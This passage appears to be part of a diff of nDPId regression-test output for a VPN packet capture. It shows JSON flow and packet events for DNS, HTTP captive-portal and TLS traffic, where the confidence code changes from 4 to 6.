{"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} 
@@ -209,74 +209,75 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAABGM9oAAP8R5lMKAADjS0tLS8d0ADUAMjjn9V4BAAABAAAAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQAB"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1569687267800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687267800,"pkt":"LH6BsEqhNDY7z3UoCABFAABOdGcAAP8Rpb4KAADjS0tLS+i+ADUAOr+fEJABAAABAAAAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAE="} 
-00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1569687267805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687267805,"pkt":"LH6BsEqhNDY7z3UoCABFAABHoW4AAP8ReL4KAADjS0tLS\/rBADUAMyCpE94BAAABAAAAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQ=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1569687267812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1569687267812,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9PxQAAP8R2yIKAADjS0tLS8sWADUAKZk5eJ4BAAABAAAAAAAABG1haWwGdmlhc2F0A2NvbQAAAQAB"} 
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 